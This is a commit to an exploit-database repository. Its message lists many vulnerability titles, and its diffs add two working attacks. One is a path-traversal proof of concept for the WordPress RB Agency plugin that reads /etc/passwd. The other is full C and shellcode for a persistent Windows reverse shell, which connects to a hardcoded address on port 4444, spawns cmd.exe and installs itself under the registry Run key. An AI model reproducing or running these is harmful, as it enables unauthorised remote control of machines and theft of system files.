iseries_parse_packet Heap Based Buffer Overflow Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack-Based Buffer Overflow Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack Based Buffer Overflow Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack-Based Buffer Overflow Wireshark - find_signature Stack-Based Out-of-Bounds Read Wireshark - AirPDcapPacketProcess Stack-Based Buffer Overflow Wireshark - getRate Stack-Based Out-of-Bounds Read Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow Wireshark - find_signature Stack Based Out-of-Bounds Read Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow Wireshark - getRate Stack Based Out-of-Bounds Read Adobe Flash TextField.variable Setter - Use-After-Free Adobe Flash TextField.Variable Setter - Use-After-Free Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read Wireshark infer_pkt_encap - Heap Based Out-of-Bounds Read Wireshark AirPDcapDecryptWPABroadcastKey - Heap Based Out-of-Bounds Read eshtery CMS - 'FileManager.aspx' Local File Disclosure eshtery CMS - ' FileManager.aspx' Local File Disclosure pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read pdfium CPDF_TextObject::CalcPositionData - Heap Based Out-of-Bounds Read pdfium CPDF_Function::Call - Stack-Based Buffer Overflow pdfium CPDF_Function::Call - Stack Based Buffer Overflow MySQL 5.5.45 (64bit) - Local Credentials Disclosure pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read Wireshark - iseries_check_file_type Stack-Based Out-of-Bounds Read Wireshark - dissect_nhdr_extopt Stack-Based Buffer Overflow pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc (libopenjpeg) Heap Based Out-of-Bounds Read Wireshark - iseries_check_file_type Stack Based Out-of-Bounds Read Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read Wireshark - dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read Tftpd32 and Tftpd64 - Denial Of Service TFTPD32 and Tftpd64 - Denial Of Service glibc - getaddrinfo Stack-Based Buffer Overflow glibc - getaddrinfo Stack Based Buffer Overflow Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow libxml2 - xmlDictAddString Heap-Based Buffer Overread libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread libxml2 - htmlCurrentChar Heap-Based Buffer Overread Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow libxml2 - xmlDictAddString Heap Based Buffer Overread libxml2 - xmlParseEndTag2 Heap Based Buffer Overread libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread libxml2 - htmlCurrentChar Heap Based Buffer Overread Kamailio 4.3.4 - Heap-Based Buffer Overflow Kamailio 4.3.4 - Heap Based Buffer Overflow Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow NRSS Reader 0.3.9 - Local Stack-Based Overflow NRSS Reader 0.3.9 - Local Stack Based Overflow Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read Windows - gdi32.dll Heap-Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Windows - gdi32.dll Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Graphite2 - GlyphCache::GlyphCache Heap-Based Buffer Overflow Graphite2 - GlyphCache::Loader Heap-Based Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow Graphite2 - GlyphCache::Loader Heap Based Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap-Based Buffer Overflow (MS16-097) Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097) PHP 5.0.0 - imap_mail() Local Denial of Service PHP 5.0.0 - 'imap_mail()' Local Denial of Service PHP 5.0.0 - html_doc_file() Local Denial of Service PHP 5.0.0 - 'html_doc_file()' Local Denial of Service
This commit is contained in:
Offensive Security
parent
51bcf38036
commit
479ae86249
6 changed files with 1642 additions and 771 deletions
24
platforms/php/webapps/40333.txt
Executable file
24
platforms/php/webapps/40333.txt
Executable file
|
|
@ -0,0 +1,24 @@
|
|||
######################
|
||||
# Exploit Title : WordPress RB Agency 2.4.7 Plugin - Local File Disclosure
|
||||
# Exploit Author : Persian Hack Team
|
||||
# Vendor Homepage : http://rbplugin.com/
|
||||
# Category [ Webapps ]
|
||||
# Tested on [ Win ]
|
||||
# Version : 2.4.7
|
||||
# Date 2016/09/03
|
||||
######################
|
||||
|
||||
PoC
|
||||
The Vulnerable page is
|
||||
/ext/forcedownload.php
|
||||
|
||||
http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd
|
||||
Youtube:https://youtu.be/5kE8Xt-My9A
|
||||
|
||||
|
||||
######################
|
||||
# Discovered by : Mojtaba MobhaM Mail:Kazemimojtaba@live.com
|
||||
# B3li3v3 M3 I will n3v3r St0p
|
||||
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
|
||||
# Homepage : http://persian-team.ir
|
||||
######################
|
||||
607
platforms/win_x86/shellcode/40334.c
Executable file
607
platforms/win_x86/shellcode/40334.c
Executable file
|
|
@ -0,0 +1,607 @@
|
|||
/*
|
||||
# Title : Windows x86 persistent reverse shell tcp
|
||||
# Author : Roziul Hasan Khan Shifat
|
||||
# Date : 04-09-2016
|
||||
# Tested on : Windows 7 x86
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
section .text
|
||||
global _start
|
||||
_start:
|
||||
|
||||
|
||||
xor ecx,ecx
|
||||
mov eax,[fs:ecx+0x30] ;PEB
|
||||
mov eax,[eax+0xc] ;PEB->Ldr
|
||||
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
|
||||
lodsd
|
||||
xchg esi,eax
|
||||
lodsd
|
||||
mov ecx,[eax+0x10] ;kernel32.dll
|
||||
|
||||
|
||||
mov ebx,[ecx+0x3c] ;DOS->elf_anew
|
||||
add ebx,ecx ;PE HEADER
|
||||
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
|
||||
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
|
||||
|
||||
mov esi,[ebx+0x20] ;AddressOfNames
|
||||
add esi,ecx
|
||||
|
||||
|
||||
xor edx,edx
|
||||
|
||||
g:
|
||||
|
||||
inc edx
|
||||
lodsd
|
||||
add eax,ecx
|
||||
cmp dword [eax],'GetP'
|
||||
jne g
|
||||
cmp dword [eax+4],'rocA'
|
||||
jne g
|
||||
cmp dword [eax+8],'ddre'
|
||||
jne g
|
||||
|
||||
mov esi,[ebx+0x1c] ;AddressOfFunctions
|
||||
add esi,ecx
|
||||
|
||||
|
||||
mov edx,[esi+edx*4]
|
||||
add edx,ecx ;GetProcAddress()
|
||||
|
||||
xor eax,eax
|
||||
push eax
|
||||
|
||||
sub esp,24
|
||||
|
||||
lea esi,[esp]
|
||||
|
||||
mov [esi],dword edx ;GetProcAddress() at offset 0
|
||||
mov edi,ecx ;kernel32.dll
|
||||
|
||||
;------------------------------
|
||||
;finding address of CreateProcessA()
|
||||
|
||||
push 0x42424173
|
||||
mov [esp+2],word ax
|
||||
push 0x7365636f
|
||||
push 0x72506574
|
||||
push 0x61657243
|
||||
|
||||
lea eax,[esp]
|
||||
|
||||
push eax
|
||||
push ecx
|
||||
|
||||
call edx
|
||||
;----------------------------
|
||||
add esp,16
|
||||
|
||||
mov [esi+4],dword eax ;CreateProcessA() at offset 4
|
||||
;-----------------------------
|
||||
;finding address of ExitProcess()
|
||||
xor ecx,ecx
|
||||
push 0x41737365
|
||||
mov [esp+3],byte cl
|
||||
push 0x636f7250
|
||||
push 0x74697845
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi]
|
||||
|
||||
add esp,12
|
||||
|
||||
mov [esi+8],dword eax ;ExitProcess() at offset 8
|
||||
;-----------------------------------------------------
|
||||
;loading ws2_32.dll
|
||||
|
||||
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
push 0x41797261
|
||||
push 0x7262694c
|
||||
push 0x64616f4c
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi]
|
||||
|
||||
add esp,12
|
||||
|
||||
xor ecx,ecx
|
||||
push 0x41416c6c
|
||||
mov [esp+2],word cx
|
||||
push 0x642e3233
|
||||
push 0x5f327377
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
call eax
|
||||
add esp,8
|
||||
|
||||
mov edi,eax ;ws2_32.dll
|
||||
|
||||
;-----------------------------------
|
||||
;finding address of WSAStartup()
|
||||
xor ecx,ecx
|
||||
push 0x41417075
|
||||
mov [esp+2],word cx
|
||||
push 0x74726174
|
||||
push 0x53415357
|
||||
|
||||
lea ecx,[esp]
|
||||
push ecx
|
||||
push eax
|
||||
|
||||
call dword [esi]
|
||||
add esp,12
|
||||
|
||||
mov [esi+12],dword eax ;WSAStartup() at offset 12
|
||||
|
||||
;------------------------------------------
|
||||
;finding address of WSASocketA()
|
||||
|
||||
xor ecx,ecx
|
||||
push 0x42424174
|
||||
mov [esp+2],word cx
|
||||
push 0x656b636f
|
||||
push 0x53415357
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi]
|
||||
add esp,12
|
||||
|
||||
mov [esi+16],dword eax ;WSASocketA() at offset 16
|
||||
;-----------------------------
|
||||
;finding address of WSAConnect()
|
||||
xor ecx,ecx
|
||||
push 0x41417463
|
||||
mov [esp+2],word cx
|
||||
push 0x656e6e6f
|
||||
push 0x43415357
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi]
|
||||
add esp,12
|
||||
|
||||
mov [esi+20],dword eax ;WSAConnect() at offset 20
|
||||
;------------------------------------------------
|
||||
|
||||
;WSAStartup(514, &WSADATA)
|
||||
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
mov cx,400
|
||||
|
||||
sub esp,ecx
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
xor ebx,ebx
|
||||
mov bx,514
|
||||
|
||||
push ecx
|
||||
push ebx
|
||||
|
||||
call dword [esi+12]
|
||||
|
||||
;-------------------------------
|
||||
|
||||
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
|
||||
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
mov cl,6
|
||||
push ecx
|
||||
|
||||
sub ecx,5
|
||||
push ecx
|
||||
|
||||
inc ecx
|
||||
push ecx
|
||||
|
||||
call dword [esi+16]
|
||||
|
||||
xchg edi,eax ;SOCKET
|
||||
|
||||
;--------------------------------------------------
|
||||
;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL)
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
mov [esp],byte 2
|
||||
mov [esp+2],word 0x5c11 ;port 4444 (change it if U want)
|
||||
mov [esp+4],dword 0x81e8a8c0 ;Change it
|
||||
|
||||
connect:
|
||||
xor ecx,ecx
|
||||
lea ebx,[esp]
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
|
||||
mov cl,16
|
||||
|
||||
|
||||
push ecx
|
||||
push ebx
|
||||
push edi
|
||||
|
||||
call dword [esi+20]
|
||||
xor ecx,ecx
|
||||
|
||||
cmp eax,ecx
|
||||
jnz connect
|
||||
;----------------------------------------------
|
||||
|
||||
xor ecx,ecx
|
||||
|
||||
sub esp,16
|
||||
lea edx,[esp] ;PROCESS_INFORMATION
|
||||
|
||||
push edi
|
||||
push edi
|
||||
push edi
|
||||
push ecx
|
||||
push word cx
|
||||
push word cx
|
||||
|
||||
mov cl,255
|
||||
inc ecx
|
||||
|
||||
push ecx
|
||||
xor ecx,ecx
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
mov cl,68
|
||||
|
||||
push ecx
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
|
||||
xor edx,edx
|
||||
push 0x41657865
|
||||
mov [esp+3],byte dl
|
||||
push 0x2e646d63
|
||||
|
||||
lea edx,[esp]
|
||||
;-----------------------------
|
||||
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info)
|
||||
|
||||
push ebx
|
||||
push ecx
|
||||
|
||||
xor ecx,ecx
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
inc ecx
|
||||
push ecx
|
||||
xor ecx,ecx
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push edx
|
||||
push ecx
|
||||
|
||||
call dword [esi+4]
|
||||
|
||||
push eax
|
||||
call dword [esi+8]
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <_start>:
|
||||
0: 31 c9 xor %ecx,%ecx
|
||||
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
|
||||
6: 8b 40 0c mov 0xc(%eax),%eax
|
||||
9: 8b 70 14 mov 0x14(%eax),%esi
|
||||
c: ad lods %ds:(%esi),%eax
|
||||
d: 96 xchg %eax,%esi
|
||||
e: ad lods %ds:(%esi),%eax
|
||||
f: 8b 48 10 mov 0x10(%eax),%ecx
|
||||
12: 8b 59 3c mov 0x3c(%ecx),%ebx
|
||||
15: 01 cb add %ecx,%ebx
|
||||
17: 8b 5b 78 mov 0x78(%ebx),%ebx
|
||||
1a: 01 cb add %ecx,%ebx
|
||||
1c: 8b 73 20 mov 0x20(%ebx),%esi
|
||||
1f: 01 ce add %ecx,%esi
|
||||
21: 31 d2 xor %edx,%edx
|
||||
|
||||
00000023 <g>:
|
||||
23: 42 inc %edx
|
||||
24: ad lods %ds:(%esi),%eax
|
||||
25: 01 c8 add %ecx,%eax
|
||||
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
|
||||
2d: 75 f4 jne 23 <g>
|
||||
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
|
||||
36: 75 eb jne 23 <g>
|
||||
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
|
||||
3f: 75 e2 jne 23 <g>
|
||||
41: 8b 73 1c mov 0x1c(%ebx),%esi
|
||||
44: 01 ce add %ecx,%esi
|
||||
46: 8b 14 96 mov (%esi,%edx,4),%edx
|
||||
49: 01 ca add %ecx,%edx
|
||||
4b: 31 c0 xor %eax,%eax
|
||||
4d: 50 push %eax
|
||||
4e: 83 ec 18 sub $0x18,%esp
|
||||
51: 8d 34 24 lea (%esp),%esi
|
||||
54: 89 16 mov %edx,(%esi)
|
||||
56: 89 cf mov %ecx,%edi
|
||||
58: 68 73 41 42 42 push $0x42424173
|
||||
5d: 66 89 44 24 02 mov %ax,0x2(%esp)
|
||||
62: 68 6f 63 65 73 push $0x7365636f
|
||||
67: 68 74 65 50 72 push $0x72506574
|
||||
6c: 68 43 72 65 61 push $0x61657243
|
||||
71: 8d 04 24 lea (%esp),%eax
|
||||
74: 50 push %eax
|
||||
75: 51 push %ecx
|
||||
76: ff d2 call *%edx
|
||||
78: 83 c4 10 add $0x10,%esp
|
||||
7b: 89 46 04 mov %eax,0x4(%esi)
|
||||
7e: 31 c9 xor %ecx,%ecx
|
||||
80: 68 65 73 73 41 push $0x41737365
|
||||
85: 88 4c 24 03 mov %cl,0x3(%esp)
|
||||
89: 68 50 72 6f 63 push $0x636f7250
|
||||
8e: 68 45 78 69 74 push $0x74697845
|
||||
93: 8d 0c 24 lea (%esp),%ecx
|
||||
96: 51 push %ecx
|
||||
97: 57 push %edi
|
||||
98: ff 16 call *(%esi)
|
||||
9a: 83 c4 0c add $0xc,%esp
|
||||
9d: 89 46 08 mov %eax,0x8(%esi)
|
||||
a0: 31 c9 xor %ecx,%ecx
|
||||
a2: 51 push %ecx
|
||||
a3: 68 61 72 79 41 push $0x41797261
|
||||
a8: 68 4c 69 62 72 push $0x7262694c
|
||||
ad: 68 4c 6f 61 64 push $0x64616f4c
|
||||
b2: 8d 0c 24 lea (%esp),%ecx
|
||||
b5: 51 push %ecx
|
||||
b6: 57 push %edi
|
||||
b7: ff 16 call *(%esi)
|
||||
b9: 83 c4 0c add $0xc,%esp
|
||||
bc: 31 c9 xor %ecx,%ecx
|
||||
be: 68 6c 6c 41 41 push $0x41416c6c
|
||||
c3: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
c8: 68 33 32 2e 64 push $0x642e3233
|
||||
cd: 68 77 73 32 5f push $0x5f327377
|
||||
d2: 8d 0c 24 lea (%esp),%ecx
|
||||
d5: 51 push %ecx
|
||||
d6: ff d0 call *%eax
|
||||
d8: 83 c4 08 add $0x8,%esp
|
||||
db: 89 c7 mov %eax,%edi
|
||||
dd: 31 c9 xor %ecx,%ecx
|
||||
df: 68 75 70 41 41 push $0x41417075
|
||||
e4: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
e9: 68 74 61 72 74 push $0x74726174
|
||||
ee: 68 57 53 41 53 push $0x53415357
|
||||
f3: 8d 0c 24 lea (%esp),%ecx
|
||||
f6: 51 push %ecx
|
||||
f7: 50 push %eax
|
||||
f8: ff 16 call *(%esi)
|
||||
fa: 83 c4 0c add $0xc,%esp
|
||||
fd: 89 46 0c mov %eax,0xc(%esi)
|
||||
100: 31 c9 xor %ecx,%ecx
|
||||
102: 68 74 41 42 42 push $0x42424174
|
||||
107: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
10c: 68 6f 63 6b 65 push $0x656b636f
|
||||
111: 68 57 53 41 53 push $0x53415357
|
||||
116: 8d 0c 24 lea (%esp),%ecx
|
||||
119: 51 push %ecx
|
||||
11a: 57 push %edi
|
||||
11b: ff 16 call *(%esi)
|
||||
11d: 83 c4 0c add $0xc,%esp
|
||||
120: 89 46 10 mov %eax,0x10(%esi)
|
||||
123: 31 c9 xor %ecx,%ecx
|
||||
125: 68 63 74 41 41 push $0x41417463
|
||||
12a: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
12f: 68 6f 6e 6e 65 push $0x656e6e6f
|
||||
134: 68 57 53 41 43 push $0x43415357
|
||||
139: 8d 0c 24 lea (%esp),%ecx
|
||||
13c: 51 push %ecx
|
||||
13d: 57 push %edi
|
||||
13e: ff 16 call *(%esi)
|
||||
140: 83 c4 0c add $0xc,%esp
|
||||
143: 89 46 14 mov %eax,0x14(%esi)
|
||||
146: 31 c9 xor %ecx,%ecx
|
||||
148: 51 push %ecx
|
||||
149: 66 b9 90 01 mov $0x190,%cx
|
||||
14d: 29 cc sub %ecx,%esp
|
||||
14f: 8d 0c 24 lea (%esp),%ecx
|
||||
152: 31 db xor %ebx,%ebx
|
||||
154: 66 bb 02 02 mov $0x202,%bx
|
||||
158: 51 push %ecx
|
||||
159: 53 push %ebx
|
||||
15a: ff 56 0c call *0xc(%esi)
|
||||
15d: 31 c9 xor %ecx,%ecx
|
||||
15f: 51 push %ecx
|
||||
160: 51 push %ecx
|
||||
161: 51 push %ecx
|
||||
162: b1 06 mov $0x6,%cl
|
||||
164: 51 push %ecx
|
||||
165: 83 e9 05 sub $0x5,%ecx
|
||||
168: 51 push %ecx
|
||||
169: 41 inc %ecx
|
||||
16a: 51 push %ecx
|
||||
16b: ff 56 10 call *0x10(%esi)
|
||||
16e: 97 xchg %eax,%edi
|
||||
16f: 31 c9 xor %ecx,%ecx
|
||||
171: 51 push %ecx
|
||||
172: 51 push %ecx
|
||||
173: 51 push %ecx
|
||||
174: 51 push %ecx
|
||||
175: c6 04 24 02 movb $0x2,(%esp)
|
||||
179: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
|
||||
180: c7 44 24 04 c0 a8 e8 movl $0x81e8a8c0,0x4(%esp)
|
||||
187: 81
|
||||
|
||||
00000188 <connect>:
|
||||
188: 31 c9 xor %ecx,%ecx
|
||||
18a: 8d 1c 24 lea (%esp),%ebx
|
||||
18d: 51 push %ecx
|
||||
18e: 51 push %ecx
|
||||
18f: 51 push %ecx
|
||||
190: 51 push %ecx
|
||||
191: b1 10 mov $0x10,%cl
|
||||
193: 51 push %ecx
|
||||
194: 53 push %ebx
|
||||
195: 57 push %edi
|
||||
196: ff 56 14 call *0x14(%esi)
|
||||
199: 31 c9 xor %ecx,%ecx
|
||||
19b: 39 c8 cmp %ecx,%eax
|
||||
19d: 75 e9 jne 188 <connect>
|
||||
19f: 31 c9 xor %ecx,%ecx
|
||||
1a1: 83 ec 10 sub $0x10,%esp
|
||||
1a4: 8d 14 24 lea (%esp),%edx
|
||||
1a7: 57 push %edi
|
||||
1a8: 57 push %edi
|
||||
1a9: 57 push %edi
|
||||
1aa: 51 push %ecx
|
||||
1ab: 66 51 push %cx
|
||||
1ad: 66 51 push %cx
|
||||
1af: b1 ff mov $0xff,%cl
|
||||
1b1: 41 inc %ecx
|
||||
1b2: 51 push %ecx
|
||||
1b3: 31 c9 xor %ecx,%ecx
|
||||
1b5: 51 push %ecx
|
||||
1b6: 51 push %ecx
|
||||
1b7: 51 push %ecx
|
||||
1b8: 51 push %ecx
|
||||
1b9: 51 push %ecx
|
||||
1ba: 51 push %ecx
|
||||
1bb: 51 push %ecx
|
||||
1bc: 51 push %ecx
|
||||
1bd: 51 push %ecx
|
||||
1be: 51 push %ecx
|
||||
1bf: b1 44 mov $0x44,%cl
|
||||
1c1: 51 push %ecx
|
||||
1c2: 8d 0c 24 lea (%esp),%ecx
|
||||
1c5: 31 d2 xor %edx,%edx
|
||||
1c7: 68 65 78 65 41 push $0x41657865
|
||||
1cc: 88 54 24 03 mov %dl,0x3(%esp)
|
||||
1d0: 68 63 6d 64 2e push $0x2e646d63
|
||||
1d5: 8d 14 24 lea (%esp),%edx
|
||||
1d8: 53 push %ebx
|
||||
1d9: 51 push %ecx
|
||||
1da: 31 c9 xor %ecx,%ecx
|
||||
1dc: 51 push %ecx
|
||||
1dd: 51 push %ecx
|
||||
1de: 51 push %ecx
|
||||
1df: 41 inc %ecx
|
||||
1e0: 51 push %ecx
|
||||
1e1: 31 c9 xor %ecx,%ecx
|
||||
1e3: 51 push %ecx
|
||||
1e4: 51 push %ecx
|
||||
1e5: 52 push %edx
|
||||
1e6: 51 push %ecx
|
||||
1e7: ff 56 04 call *0x4(%esi)
|
||||
1ea: 50 push %eax
|
||||
1eb: ff 56 08 call *0x8(%esi)
|
||||
*/
|
||||
|
||||
|
||||
#include<stdio.h>
|
||||
#include<windows.h>
|
||||
#include<string.h>
|
||||
|
||||
char shellcode[]=\
|
||||
|
||||
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08";
|
||||
|
||||
int main(int li,char *a[])
|
||||
{
|
||||
char info[200];
|
||||
DWORD l;
|
||||
HKEY i;
|
||||
|
||||
|
||||
RegOpenKeyA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&i);
|
||||
int r= RegQueryValueExA(i,"reverse_shell_tcp",0,NULL,(LPBYTE)info,&l);
|
||||
|
||||
if(i!=0)
|
||||
{
|
||||
RegSetValueExA(i,"reverse_shell_tcp",0,REG_SZ,a[0],strlen(a[0]));
|
||||
RegCloseKey(i);
|
||||
}
|
||||
else
|
||||
RegCloseKey(i);
|
||||
|
||||
|
||||
|
||||
|
||||
int mode;
|
||||
|
||||
|
||||
|
||||
if(li==1)
|
||||
mode=1;
|
||||
else
|
||||
mode=atoi(a[1]);
|
||||
|
||||
switch(mode)
|
||||
{
|
||||
|
||||
|
||||
|
||||
case 78:
|
||||
(* (int(*)())shellcode )();
|
||||
break;
|
||||
|
||||
case 1:
|
||||
default:
|
||||
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
|
||||
break;
|
||||
}
|
||||
|
||||
|
||||
return 0;
|
